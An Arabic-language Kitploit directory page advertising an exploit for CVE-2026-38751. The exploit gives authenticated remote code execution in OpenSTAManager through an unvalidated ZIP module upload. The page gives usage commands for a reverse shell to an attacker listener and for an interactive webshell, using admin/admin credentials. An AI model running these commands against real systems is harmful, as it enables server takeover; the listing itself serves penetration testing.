Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-38751 — استغلال تنفيذ تعليمات برمجية عن بعد مُصادق عليه لـ OpenSTAManager عبر تحميل ZIP غير مُدقق. يدعم وضعَي الصدفة العكسية والصدفة الويب التفاعلية لاختبار الاختراق. | Kitploit
أدوات/GitHubGitHub/why-shell/cve-2026-38751
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubwhy-shell/cve-2026-38751

CVE-2026-38751

استغلال تنفيذ تعليمات برمجية عن بعد مُصادق عليه لـ OpenSTAManager عبر تحميل ZIP غير مُدقق. يدعم وضعَي الصدفة العكسية والصدفة الويب التفاعلية لاختبار الاختراق.

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-38751 — تحميل وحدة OpenSTAManager RCE

تنفيذ تعليمات برمجية عن بعد (RCE) موثَّق عبر تحميل ZIP غير مُتحقَّق منه في نقطة تحديث الوحدة.

المتأثر: OpenSTAManager <= 2.10.x

المتطلبات

pip install requests

الاستخدام

root@kitploit:~
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444

# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive

المراجع

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-38751

إخلاء مسؤولية

للاستخدام في اختبار الاختراق المصرح به والأغراض التعليمية فقط.

تنزيل الأداة